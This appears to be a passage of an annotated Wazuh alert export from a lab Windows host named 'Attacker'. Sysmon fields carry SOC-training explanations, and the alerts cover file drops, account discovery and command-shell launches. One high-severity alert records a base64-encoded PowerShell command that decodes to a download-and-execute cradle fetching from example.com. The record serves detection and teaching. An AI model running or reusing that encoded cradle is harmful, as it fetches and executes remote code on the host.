data.win.eventdata.targetFilename:  C:\\Windows\\Temp\\SSS_5c222e4a97b1db0101000000e030380b\\downlevel\\api-ms-win-crt-utility-l1-1-0.dll
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-20 01:55:28.431
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Executable dropped in Windows root folder

🧠 What happened? Executable dropped in Windows root folder

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:35:54.659+0000 | 🧠 MITRE: ['Lateral Movement'] – ['Lateral Tool Transfer'] [T1570]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1570

🔍 Full Alert Details
timestamp:  2025-04-24T22:35:54.659+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  6
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable dropped in Windows root folder
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92217
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1570']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Lateral Movement']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Lateral Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  36
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534154.728840
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-20T01:55:28.4706482Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  260707
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-20 01:55:28.469 ProcessGuid: {94294ddc-532b-6804-6b09-000000000e00} ProcessId: 12512 Image: C:\WINDOWS\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.26100.3764_none_a5067b2d776484b6\TiWorker.exe TargetFilename: C:\Windows\Temp\SSS_5c222e4a97b1db0101000000e030380b\downlevel\api-ms-win-security-sddl-l1-1-0.dll CreationUtcTime: 2025-04-20 01:55:28.469 User: NT AUTHORITY\SYSTEM"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-20 01:55:28.469
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-532b-6804-6b09-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  12512
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\winsxs\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.26100.3764_none_a5067b2d776484b6\\TiWorker.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Windows\\Temp\\SSS_5c222e4a97b1db0101000000e030380b\\downlevel\\api-ms-win-security-sddl-l1-1-0.dll
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-20 01:55:28.469
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Agent event queue is back to normal load.

🧠 What happened? Agent event queue is back to normal load.

🔍 Why it's important: No strong indicators

🕒 2025-04-24T22:36:04.600+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Low

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:36:04.600+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Agent event queue is back to normal load.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  205
Numeric ID of the detection rule that fired.

rule.firedtimes:  1
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['wazuh', 'agent_flooding']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534164.731946
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

full_log:  wazuh: Agent buffer: 'normal'.
The complete raw log message before parsing – last‑resort truth for deep dives.

decoder.parent:  wazuh
Parent decoder used – for nested parsing.

decoder.name:  wazuh
Name of the Wazuh decoder that parsed this raw log.

data.level:  normal
Sometimes reused by custom decoders for ad‑hoc severity – treat with caution.

location:  wazuh-agent
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  3
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Low
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  No strong indicators
Short human reason we chose that label.

🎯 Recommended Actions

Discovery activity executed

🧠 What happened? Discovery activity executed

🔍 Why it's important: No strong indicators

🕒 2025-04-24T22:36:06.234+0000 | 🧠 MITRE: ['Discovery'] – ['Account Discovery'] [T1087]

🚨 Severity: Low

🧪 Investigation Guidance

[Unknown] T1087 – Account Discovery

🔍 Full Alert Details
timestamp:  2025-04-24T22:36:06.234+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Discovery activity executed
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92031
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1087']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Discovery']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Account Discovery']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  2
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534166.732160
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:31:18.9512698Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  266202
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:31:18.668 ProcessGuid: {94294ddc-bbb6-680a-ba09-000000000e00} ProcessId: 9932 Image: C:\Windows\SysWOW64\net.exe FileVersion: 10.0.26100.1882 (WinBuild.160101.0800) Description: Net Command Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: net.exe CommandLine: net.exe accounts CurrentDirectory: C:\Program Files (x86)\ossec-agent\ User: NT AUTHORITY\SYSTEM LogonGuid: {94294ddc-ea7f-67fe-e703-000000000000} LogonId: 0x3E7 TerminalSessionId: 0 IntegrityLevel: System Hashes: SHA256=0CB12D8D687B36B58A25D18D8FD4C70CB06E2F048518CF0359FC5D51B7C57883 ParentProcessGuid: {94294ddc-ea88-67fe-4900-000000000e00} ParentProcessId: 3244 ParentImage: C:\Program Files (x86)\ossec-agent\wazuh-agent.exe ParentCommandLine: "C:\Program Files (x86)\ossec-agent\wazuh-agent.exe" ParentUser: NT AUTHORITY\SYSTEM"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:31:18.668
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bbb6-680a-ba09-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  9932
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\SysWOW64\\net.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.1882 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Net Command
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  net.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  net.exe accounts
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Program Files (x86)\\ossec-agent\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea7f-67fe-e703-000000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=0CB12D8D687B36B58A25D18D8FD4C70CB06E2F048518CF0359FC5D51B7C57883
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-ea88-67fe-4900-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  3244
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Program Files (x86)\\ossec-agent\\wazuh-agent.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\Program Files (x86)\\ossec-agent\\wazuh-agent.exe\"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  3
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Low
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  No strong indicators
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:36:44.315+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:36:44.315+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  1
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534204.737392
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:32:53.1717799Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  279823
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:32:52.033 ProcessGuid: {94294ddc-bc14-680a-020a-000000000e00} ProcessId: 9372 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-bc11-680a-ff09-000000000e00} ParentProcessId: 13080 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:32:52.033
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bc14-680a-020a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  9372
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-bc11-680a-ff09-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  13080
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Windows command prompt started by an abnormal process

🧠 What happened? Windows command prompt started by an abnormal process

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:36:44.495+0000 | 🧠 MITRE: ['Execution'] – ['Windows Command Shell'] [T1059.003]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:36:44.495+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  4
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Windows command prompt started by an abnormal process
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92052
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.003']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Windows Command Shell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  3
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534204.745458
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:32:59.8330733Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  279936
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:32:59.779 ProcessGuid: {94294ddc-bc1b-680a-0b0a-000000000e00} ProcessId: 9120 Image: C:\Windows\System32\cmd.exe FileVersion: 10.0.26100.3624 (WinBuild.160101.0800) Description: Windows Command Processor Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: Cmd.Exe CommandLine: "C:\WINDOWS\system32\cmd.exe" /Q /C ""C:\Program Files (x86)\Google\GoogleUpdater\137.0.7115.0\uninstall.cmd" --dir="C:\Program Files (x86)\Google\GoogleUpdater\137.0.7115.0"" CurrentDirectory: C:\WINDOWS\system32\ User: NT AUTHORITY\SYSTEM LogonGuid: {94294ddc-ea7f-67fe-e703-000000000000} LogonId: 0x3E7 TerminalSessionId: 0 IntegrityLevel: System Hashes: SHA256=6EEF334D826BE3DC737BB30FBE84B69E529AAB956EC33D714B5A75276A58ED04 ParentProcessGuid: {94294ddc-bc07-680a-f709-000000000e00} ParentProcessId: 8992 ParentImage: C:\Program Files (x86)\Google\GoogleUpdater\137.0.7115.0\updater.exe ParentCommandLine: "C:\Program Files (x86)\Google\GoogleUpdater\137.0.7115.0\updater.exe" --system --windows-service --service=update-internal ParentUser: NT AUTHORITY\SYSTEM"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:32:59.779
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

